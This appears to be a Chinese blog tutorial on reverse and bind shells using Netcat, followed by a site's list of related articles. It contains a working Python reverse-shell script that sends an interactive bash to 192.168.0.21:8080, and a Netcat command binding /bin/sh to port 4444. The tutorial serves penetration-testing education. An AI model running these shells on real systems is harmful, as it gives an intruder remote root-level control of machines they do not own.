• reverse shell

  • bind shell

reverse shell描述图:

在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用Netcat发出命令启动反向shell。

先启动攻击端的监听:

再在目标端启动反向shell:

 linux

然后可以在攻击端控制目标端的服务器,以root权限;

win7

然后可以在攻击端控制目标端的win7系统,以administrator权限;

python的反向shell:

import os,socket,subprocess;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.21',8080))
#重定向shell输出
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
#执行子程序
p=subprocess.call(['/bin/bash','-i'])

正向bind Shell

在该图中,目标使用Netcat侦听器将Bash shell绑定到它特定端口4444。攻击者使用简单的Netcat命令连接到此端口。设置bind shell的步骤如下:

使用Netcat将一个bash shell绑定到4444端口。 从攻击主机连接到端口4444上的目标主机。 从攻击主机发出命令到目标主机上。

root@kali:~# nc -lvp 4444 -e /bin/sh
listening on [any] 4444 ...
10.1.20.x: inverse host lookup failed: Unknown host
connect to [10.1.20.x] from (UNKNOWN) [10.1.20.x] 6065
root@kali:~# a

转载于:https://www.cnblogs.com/botoo/p/10238785.html

使用netcat的正向 / 反向shell相关推荐

  1. Shells:一款功能强大的反向Shell快速生成工具

    关于Shells Shells是一款功能强大的反向Shell快速生成工具,该工具由4ndr34z负责开发和维护,可以帮助广大研究人员轻松生成常用的反向Shell.如果你需要一种简单的方法来生成格式化的 ...

  2. python控制摄像头拍照是反的_使用反向Shell控制摄像头

    原标题:使用反向Shell控制摄像头 如果你已经用胶条封住了你的网络摄像头,你可能是因为听说过黑客或NSA可以远程监视你.那么问题来了,这些你素未谋面人又是如何远程连接到你的机器并监视你的呢? 这可能 ...

  3. 谷歌大脑提出对智能体进行「正向-反向」强化学习训练,加速训练过程

    原文来源:arXiv 作者:Ashley D. Edwards.Laura Downs.James C. Davidson 「雷克世界」编译:嗯~是阿童木呀.KABUDA.EVA 在强化学习问题中,关 ...

  4. 使用Android BindingAdapter与InverseBindingAdapter实现SeekBar双向(正向/反向)数据绑定...

    使用Android BindingAdapter与InverseBindingAdapter实现SeekBar双向(正向/反向)数据绑定 在我之前写的系列文章中,继续深化Android数据绑定技术的使 ...

  5. 一款功能强大,可扩展端到端加密反向Shell的工具

    关于Mediator Mediator是一款功能强大的可扩展端到端加密反向Shell,该工具基于新型架构实现,采用Python语言开发,能够帮助广大研究人员通过一台"Mediator&quo ...

  6. 【 Grey Hack 】反向Shell

    目录 调查 准备反向shell 反向shell 提权 版本:Grey Hack v0.7.3618 - Alpha 如图,本案例中目标IP尚未开放常见端口 调查 通过路由器获得目标PC的用户邮箱账号和 ...

  7. JavaScript反向shell

    Node.js反向Shell 摘自:http://www.itfang.net/?p=109 如下的Javascript就是一个Node.js的反向连接shell. 这个payload将会生成一个/b ...

  8. 杂记1:正向反向迭代器,不同stl容器的lower_bound的使用(set,map,vector,arr,pair),数字转字符串

    感觉自己记性真的不行,很多之前用过,查过的知识点都忘掉了,开个博客记一下吧. 文章目录 迭代器 lower_bound,upper_bound 可以忽略,我暂时没发现用处 这个比较有用:不同容器的lo ...

  9. 用python写一个程序控制其它软件_程序员:利用Python实现可控制肉鸡的反向Shell...

    一.初识 1.1 用 Python 实现一个可以管理多个肉鸡的反向 Shell,为什么叫反向 Shell 呢?反向就是肉鸡作为 Client 主动连接到我们的 Server 端,以实现对多个远程主机的 ...

最新文章

  1. Java的左移和右移的含义!
  2. 14Facade(门面)模式
  3. python with 打开多个文件
  4. 开关电源怎么测试文波_示波器测试开关电源纹波的方法
  5. 初学Java,这三个阶段你经历过吗?
  6. 使用numpy出现DeprecationWarning: The normed argument is ignored when density is provided. 解决方法忽略警告的方法
  7. 《游戏视频主播手册》——2.2 哪些人适合做游戏主播
  8. HTML学习笔记--HTML的语法【1】
  9. 2015蓝桥杯C++A:手链样式(圆排列和环排列)
  10. thinkphp 3.+ Apache url重写问题(.htaccess)
  11. docker - 常用命令详解
  12. Arduino使用NRF24L01模块进行无线通信
  13. 基于FFmpeg的H265编码器
  14. 愚人节,你的微信公众号图文排版够愚吗?
  15. python pygame 动画_pygame行走的小猫多帧动画演示程序
  16. win10 开机黑屏时间长 联想y470解决方案
  17. DNS记录类型介绍(A记录、MX记录、NS记录等)
  18. unity 调整画布大小_使用画布,拖放和File API调整图像大小
  19. 【EXLIBRIS】纸版书目整理 -- 小书架 上 01 【166 种】【203册】
  20. 触摸IC XTP2046 驱动笔记

热门文章

  1. 中子中子测井发出打入地层_测井曲线解释
  2. 【离散数学】滨江学院 期末考试 题库
  3. mysql for update死锁_Mysql 数据库死锁过程分析(select for update)
  4. Perl Redis 连接测试脚本,获取list长度
  5. 超实用的8个Linux命令行性能监测工具
  6. Linux系统性能检测
  7. java与javac版本不一致问题
  8. 我从佛学里悟到的自由
  9. [rsync] linux rsync 安装
  10. Zookeeper的Quorum机制-谈谈怎样解决脑裂(split-brain)